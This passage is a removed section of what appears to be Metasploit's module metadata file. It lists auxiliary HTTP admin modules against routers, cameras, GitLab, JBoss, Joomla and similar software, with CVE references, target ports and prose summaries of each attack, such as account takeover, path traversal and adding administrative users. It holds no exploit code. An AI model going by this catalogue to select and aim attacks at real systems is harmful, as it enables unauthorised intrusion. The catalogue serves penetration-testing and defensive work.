arbitrary system commands as 'root'.", - "references": [ - "CVE-2017-5259", - "URL-https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb", - "is_install_path": true, - "ref_name": "admin/http/cnpilot_r_cmd_exec", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/cnpilot_r_fpt": { - "name": "Cambium cnPilot r200/r201 File Path Traversal", - "fullname": "auxiliary/admin/http/cnpilot_r_fpt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Karn Ganeshen " - ], - "description": "This module exploits a File Path Traversal vulnerability in Cambium\n cnPilot r200/r201 to read arbitrary files off the file system. Affected\n versions - 4.3.3-R4 and prior.", - "references": [ - "CVE-2017-5261", - "URL-https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/cnpilot_r_fpt.rb", - "is_install_path": true, - "ref_name": "admin/http/cnpilot_r_fpt", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/contentkeeper_fileaccess": { - "name": "ContentKeeper Web Appliance mimencode File Access", - "fullname": "auxiliary/admin/http/contentkeeper_fileaccess", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module abuses the 'mimencode' binary present within\n ContentKeeper Web filtering appliances to retrieve arbitrary\n files outside of the webroot.", - "references": [ - "OSVDB-54551", - "URL-http://www.aushack.com/200904-contentkeeper.txt" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb", - "is_install_path": true, - "ref_name": "admin/http/contentkeeper_fileaccess", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/dlink_dir_300_600_exec_noauth": { - "name": "D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution", - "fullname": "auxiliary/admin/http/dlink_dir_300_600_exec_noauth", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-02-04", - "type": "auxiliary", - "author": [ - "Michael Messner " - ], - "description": "This module exploits an OS Command Injection vulnerability in some D-Link\n Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in\n command.php, which is accessible without authentication. This module has been\n tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.\n In order to get a remote shell the telnetd could be started without any\n authentication.", - "references": [ - "OSVDB-89861", - "EDB-24453", - "URL-https://eu.dlink.com/uk/en/products/dir-600-wireless-n-150-home-router", - "URL-http://www.s3cur1ty.de/home-network-horror-days", - "URL-http://www.s3cur1ty.de/m1adv2013-003" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb", - "is_install_path": true, - "ref_name": "admin/http/dlink_dir_300_600_exec_noauth", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/dlink_dir_645_password_extractor": { - "name": "D-Link DIR 645 Password Extractor", - "fullname": "auxiliary/admin/http/dlink_dir_645_password_extractor", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Roberto Paleari ", - "Michael Messner " - ], - "description": "This module exploits an authentication bypass vulnerability in DIR 645 < v1.03.\n With this vulnerability you are able to extract the password for the remote\n management.", - "references": [ - "OSVDB-90733", - "BID-58231", - "PACKETSTORM-120591" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb", - "is_install_path": true, - "ref_name": "admin/http/dlink_dir_645_password_extractor", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/dlink_dsl320b_password_extractor": { - "name": "D-Link DSL 320B Password Extractor", - "fullname": "auxiliary/admin/http/dlink_dsl320b_password_extractor", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Michael Messner " - ], - "description": "This module exploits an authentication bypass vulnerability in D-Link DSL 320B\n <=v1.23. This vulnerability allows to extract the credentials for the remote\n management interface.", - "references": [ - "EDB-25252", - "OSVDB-93013", - "URL-http://www.s3cur1ty.de/m1adv2013-018" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb", - "is_install_path": true, - "ref_name": "admin/http/dlink_dsl320b_password_extractor", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/foreman_openstack_satellite_priv_esc": { - "name": "Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment", - "fullname": "auxiliary/admin/http/foreman_openstack_satellite_priv_esc", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-06-06", - "type": "auxiliary", - "author": [ - "Ramon de C Valle " - ], - "description": "This module exploits a mass assignment vulnerability in the 'create'\n action of 'users' controller of Foreman and Red Hat OpenStack/Satellite\n (Foreman 1.2.0-RC1 and earlier) by creating an arbitrary administrator\n account. For this exploit to work, your account must have 'create_users'\n permission (e.g., Manager role).", - "references": [ - "BID-60835", - "CVE-2013-2113", - "CWE-915", - "OSVDB-94655", - "URL-https://bugzilla.redhat.com/show_bug.cgi?id=966804", - "URL-https://projects.theforeman.org/issues/2630" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb", - "is_install_path": true, - "ref_name": "admin/http/foreman_openstack_satellite_priv_esc", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/fortra_filecatalyst_workflow_sqli": { - "name": "Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)", - "fullname": "auxiliary/admin/http/fortra_filecatalyst_workflow_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": "2024-06-25", - "type": "auxiliary", - "author": [ - "Tenable", - "Michael Heinzl" - ], - "description": "This module exploits a SQL injection vulnerability in Fortra FileCatalyst Workflow <= v5.1.6 Build 135, by adding a new\n administrative user to the web interface of the application.", - "references": [ - "CVE-2024-5276", - "URL-https://www.tenable.com/security/research/tra-2024-25", - "URL-https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-08-16 14:12:41 +0000", - "path": "/modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb", - "is_install_path": true, - "ref_name": "admin/http/fortra_filecatalyst_workflow_sqli", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/gitlab_password_reset_account_takeover": { - "name": "GitLab Password Reset Account Takeover", - "fullname": "auxiliary/admin/http/gitlab_password_reset_account_takeover", - "aliases": [], - "rank": 300, - "disclosure_date": "2024-01-11", - "type": "auxiliary", - "author": [ - "h00die", - "asterion04" - ], - "description": "This module exploits an account-take-over vulnerability that allows users\n to take control of a gitlab account without user interaction.\n\n The vulnerability lies in the password reset functionality. Its possible to provide 2 emails\n and the reset code will be sent to both. It is therefore possible to provide the e-mail\n address of the target account as well as that of one we control, and to reset the password.\n\n 2-factor authentication prevents this vulnerability from being exploitable. There is no\n discernable difference between a vulnerable and non-vulnerable server response.\n\n Vulnerable versions include:\n 16.1 < 16.1.6,\n 16.2 < 16.2.9,\n 16.3 < 16.3.7,\n 16.4 < 16.4.5,\n 16.5 < 16.5.6,\n 16.6 < 16.6.4,\n and 16.7 < 16.7.2.", - "references": [ - "CVE-2023-7028", - "URL-https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/", - "URL-https://github.com/duy-31/CVE-2023-7028" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-27 07:44:11 +0000", - "path": "/modules/auxiliary/admin/http/gitlab_password_reset_account_takeover.rb", - "is_install_path": true, - "ref_name": "admin/http/gitlab_password_reset_account_takeover", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/gitstack_rest": { - "name": "GitStack Unauthenticated REST API Requests", - "fullname": "auxiliary/admin/http/gitstack_rest", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-01-15", - "type": "auxiliary", - "author": [ - "Kacper Szurek", - "Jacob Robles" - ], - "description": "This modules exploits unauthenticated REST API requests in GitStack through v2.3.10.\n The module supports requests for listing users of the application and listing\n available repositories. Additionally, the module can create a user and add the user\n to the application's repositories. This module has been tested against GitStack v2.3.10.", - "references": [ - "CVE-2018-5955", - "EDB-43777", - "EDB-44044" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/gitstack_rest.rb", - "is_install_path": true, - "ref_name": "admin/http/gitstack_rest", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "CLEANUP", - "description": "Remove user from repositories and delete user" - }, - { - "name": "CREATE", - "description": "Create a user on the application" - }, - { - "name": "LIST", - "description": "List application users" - }, - { - "name": "LIST_REPOS", - "description": "List available repositories" - } - ] - }, - "auxiliary_admin/http/grafana_auth_bypass": { - "name": "Grafana 2.0 through 5.2.2 authentication bypass for LDAP and OAuth", - "fullname": "auxiliary/admin/http/grafana_auth_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-08-14", - "type": "auxiliary", - "author": [ - "Rene Riedling", - "Sebastian Solnica" - ], - "description": "This module generates a remember me cookie for a valid username. Through unpropper seeding \n while userdate are requested from LDAP or OAuth it's possible to craft a valid remember me cookie. \n This cookie can be used for bypass authentication for everyone knowing a valid username.", - "references": [ - "CVE-2018-15727", - "URL-https://grafana.com/blog/2018/08/29/grafana-5.2.3-and-4.6.4-released-with-important-security-fix/" - ], - "platform": "", - "arch": "", - "rport": 3000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-09-29 01:28:56 +0000", - "path": "/modules/auxiliary/admin/http/grafana_auth_bypass.py", - "is_install_path": true, - "ref_name": "admin/http/grafana_auth_bypass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/hikvision_unauth_pwd_reset_cve_2017_7921": { - "name": "Hikvision IP Camera Unauthenticated Password Change Via Improper Authentication Logic", - "fullname": "auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-09-23", - "type": "auxiliary", - "author": [ - "Monte Crypto", - "h00die-gr3y " - ], - "description": "Many Hikvision IP cameras contain improper authentication logic which allows unauthenticated impersonation of any configured user account.\n The vulnerability has been present in Hikvision products since 2014. In addition to Hikvision-branded devices, it\n affects many white-labeled camera products sold under a variety of brand names.\n\n Hundreds of thousands of vulnerable devices are still exposed to the Internet at the time\n of publishing (shodan search: '\"App-webs\" \"200 OK\"'). Some of these devices can never be patched due to to the\n vendor preventing users from upgrading the installed firmware on the affected device.\n\n This module utilizes the bug in the authentication logic to perform an unauthenticated password change of any user account on\n a vulnerable Hikvision IP Camera. This can then be utilized to gain full administrative access to the affected device.", - "references": [ - "CVE-2017-7921", - "PACKETSTORM-144097", - "URL-https://ipvm.com/reports/hik-exploit", - "URL-https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921", - "URL-https://seclists.org/fulldisclosure/2017/Sep/23" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.rb", - "is_install_path": true, - "ref_name": "admin/http/hikvision_unauth_pwd_reset_cve_2017_7921", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/hp_web_jetadmin_exec": { - "name": "HP Web JetAdmin 6.5 Server Arbitrary Command Execution", - "fullname": "auxiliary/admin/http/hp_web_jetadmin_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-04-27", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module abuses a command execution vulnerability within the\n web based management console of the Hewlett-Packard Web JetAdmin\n network printer tool v6.2 - v6.5. It is possible to execute commands\n as SYSTEM without authentication. The vulnerability also affects POSIX\n systems, however at this stage the module only works against Windows.\n This module does not apply to HP printers.", - "references": [ - "OSVDB-5798", - "BID-10224", - "EDB-294" - ], - "platform": "", - "arch": "", - "rport": 8000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb", - "is_install_path": true, - "ref_name": "admin/http/hp_web_jetadmin_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/ibm_drm_download": { - "name": "IBM Data Risk Manager Arbitrary File Download", - "fullname": "auxiliary/admin/http/ibm_drm_download", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-04-21", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "IBM Data Risk Manager (IDRM) contains two vulnerabilities that can be chained by\n an unauthenticated attacker to download arbitrary files off the system.\n The first is an unauthenticated bypass, followed by a path traversal.\n This module exploits both vulnerabilities, giving an attacker the ability to download (non-root) files.\n A downloaded file is zipped, and this module also unzips it before storing it in the database.\n By default this module downloads Tomcat's application.properties files, which contains the\n database password, amongst other sensitive data.\n At the time of disclosure, this is was a 0 day, but IBM later patched it and released their advisory.\n Versions 2.0.2 to 2.0.4 are vulnerable, version 2.0.1 is not.", - "references": [ - "CVE-2020-4427", - "CVE-2020-4429", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md", - "URL-https://seclists.org/fulldisclosure/2020/Apr/33", - "URL-https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/" - ], - "platform": "", - "arch": "", - "rport": 8443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/admin/http/ibm_drm_download.rb", - "is_install_path": true, - "ref_name": "admin/http/ibm_drm_download", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [], - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Download", - "description": "Download arbitrary file" - } - ] - }, - "auxiliary_admin/http/idsecure_auth_bypass": { - "name": "Control iD iDSecure Authentication Bypass (CVE-2023-6329)", - "fullname": "auxiliary/admin/http/idsecure_auth_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": "2023-11-27", - "type": "auxiliary", - "author": [ - "Michael Heinzl", - "Tenable" - ], - "description": "This module exploits an improper access control vulnerability (CVE-2023-6329) in Control iD iDSecure <= v4.7.43.0. It allows an\n unauthenticated remote attacker to compute valid credentials and to add a new administrative user to the web interface of the product.", - "references": [ - "CVE-2023-6329", - "URL-https://www.tenable.com/security/research/tra-2023-36" - ], - "platform": "", - "arch": "", - "rport": 30443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-08-19 21:17:16 +0000", - "path": "/modules/auxiliary/admin/http/idsecure_auth_bypass.rb", - "is_install_path": true, - "ref_name": "admin/http/idsecure_auth_bypass", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/iis_auth_bypass": { - "name": "MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass", - "fullname": "auxiliary/admin/http/iis_auth_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-07-02", - "type": "auxiliary", - "author": [ - "Soroush Dalili", - "sinn3r " - ], - "description": "This module bypasses basic authentication for Internet Information Services (IIS).\n By appending the NTFS stream name to the directory name in a request, it is\n possible to bypass authentication.", - "references": [ - "CVE-2010-2731", - "OSVDB-66160", - "MSB-MS10-065", - "URL-https://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/iis_auth_bypass.rb", - "is_install_path": true, - "ref_name": "admin/http/iis_auth_bypass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/intersil_pass_reset": { - "name": "Intersil (Boa) HTTPd Basic Authentication Password Reset", - "fullname": "auxiliary/admin/http/intersil_pass_reset", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-09-10", - "type": "auxiliary", - "author": [ - "Luca \"ikki\" Carettoni ", - "Claudio \"paper\" Merloni ", - "Max Dietz " - ], - "description": "The Intersil extension in the Boa HTTP Server 0.93.x - 0.94.11\n allows basic authentication bypass when the user string is greater\n than 127 bytes long. The long string causes the password to be\n overwritten in memory, which enables the attacker to reset the\n password. In addition, the malicious attempt also may cause a\n denial-of-service condition.\n\n Please note that you must set the request URI to the directory that\n requires basic authentication in order to work properly.", - "references": [ - "CVE-2007-4915", - "BID-25676", - "PACKETSTORM-59347" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/intersil_pass_reset.rb", - "is_install_path": true, - "ref_name": "admin/http/intersil_pass_reset", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/iomega_storcenterpro_sessionid": { - "name": "Iomega StorCenter Pro NAS Web Authentication Bypass", - "fullname": "auxiliary/admin/http/iomega_storcenterpro_sessionid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs,\n allowing for simple brute force attacks to bypass authentication and gain administrative\n access.", - "references": [ - "OSVDB-55586", - "CVE-2009-2367" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb", - "is_install_path": true, - "ref_name": "admin/http/iomega_storcenterpro_sessionid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/ivanti_vtm_admin": { - "name": "Ivanti Virtual Traffic Manager Authentication Bypass (CVE-2024-7593)", - "fullname": "auxiliary/admin/http/ivanti_vtm_admin", - "aliases": [], - "rank": 300, - "disclosure_date": "2024-08-05", - "type": "auxiliary", - "author": [ - "Michael Heinzl", - "ohnoisploited", - "mxalias" - ], - "description": "This module exploits an access control issue in Ivanti Virtual Traffic Manager (vTM), by adding a new\n administrative user to the web interface of the application.\n\n Affected versions include 22.7R1, 22.6R1, 22.5R1, 22.3R2, 22.3, 22.2.", - "references": [ - "PACKETSTORM-179906", - "CVE-2024-7593", - "URL-https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US" - ], - "platform": "", - "arch": "", - "rport": 9090, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-08-16 15:43:34 +0000", - "path": "/modules/auxiliary/admin/http/ivanti_vtm_admin.rb", - "is_install_path": true, - "ref_name": "admin/http/ivanti_vtm_admin", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/jboss_bshdeployer": { - "name": "JBoss JMX Console Beanshell Deployer WAR Upload and Deployment", - "fullname": "auxiliary/admin/http/jboss_bshdeployer", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "us3r777 " - ], - "description": "This module can be used to install a WAR file payload on JBoss servers that have\n an exposed \"jmx-console\" application. The payload is put on the server by\n using the jboss.system:BSHDeployer's createScriptDeployment() method.", - "references": [ - "CVE-2010-0738", - "OSVDB-64171", - "URL-https://www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now", - "URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/jboss_bshdeployer.rb", - "is_install_path": true, - "ref_name": "admin/http/jboss_bshdeployer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Deploy", - "description": "Create and deploy app (WAR) to deliver payload" - }, - { - "name": "Undeploy", - "description": "Remove app (WAR) for cleanup" - } - ] - }, - "auxiliary_admin/http/jboss_deploymentfilerepository": { - "name": "JBoss JMX Console DeploymentFileRepository WAR Upload and Deployment", - "fullname": "auxiliary/admin/http/jboss_deploymentfilerepository", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "us3r777 " - ], - "description": "This module uses the DeploymentFileRepository class in the JBoss Application Server\n to deploy a JSP file which then deploys an arbitrary WAR file.", - "references": [ - "CVE-2010-0738", - "OSVDB-64171", - "URL-https://www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now", - "URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb", - "is_install_path": true, - "ref_name": "admin/http/jboss_deploymentfilerepository", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Deploy", - "description": "Create and deploy app (WAR) to deliver payload" - }, - { - "name": "Undeploy", - "description": "Remove app (WAR) for cleanup" - } - ] - }, - "auxiliary_admin/http/jboss_seam_exec": { - "name": "JBoss Seam 2 Remote Command Execution", - "fullname": "auxiliary/admin/http/jboss_seam_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-07-19", - "type": "auxiliary", - "author": [ - "guerrino di massa", - "Cristiano Maruti " - ], - "description": "JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform\n 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression\n Language (EL) expressions, which allows remote attackers to execute arbitrary code\n via a crafted URL. This modules also has been tested successfully against IBM\n WebSphere 6.1 running on iSeries.\n\n NOTE: this is only a vulnerability when the Java Security Manager is not properly\n configured.", - "references": [ - "CVE-2010-1871", - "OSVDB-66881" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/jboss_seam_exec.rb", - "is_install_path": true, - "ref_name": "admin/http/jboss_seam_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/joomla_registration_privesc": { - "name": "Joomla Account Creation and Privilege Escalation", - "fullname": "auxiliary/admin/http/joomla_registration_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-10-25", - "type": "auxiliary", - "author": [ - "Fabio Pires ", - "Filipe Reis ", - "Vitor Oliveira " - ], - "description": "This module creates an arbitrary account with administrative privileges in Joomla versions 3.4.4\n through 3.6.3. If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).", - "references": [ - "CVE-2016-8869", - "CVE-2016-8870", - "URL-https://developer.joomla.org/security-centre/660-20161002-core-elevated-privileges.html", - "URL-https://developer.joomla.org/security-centre/659-20161001-core-account-creation.html", - "URL-https://medium.com/@showthread/joomla-3-6-4-account-creation-elevated-privileges-write-up-and-exploit-965d8fb46fa2" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": 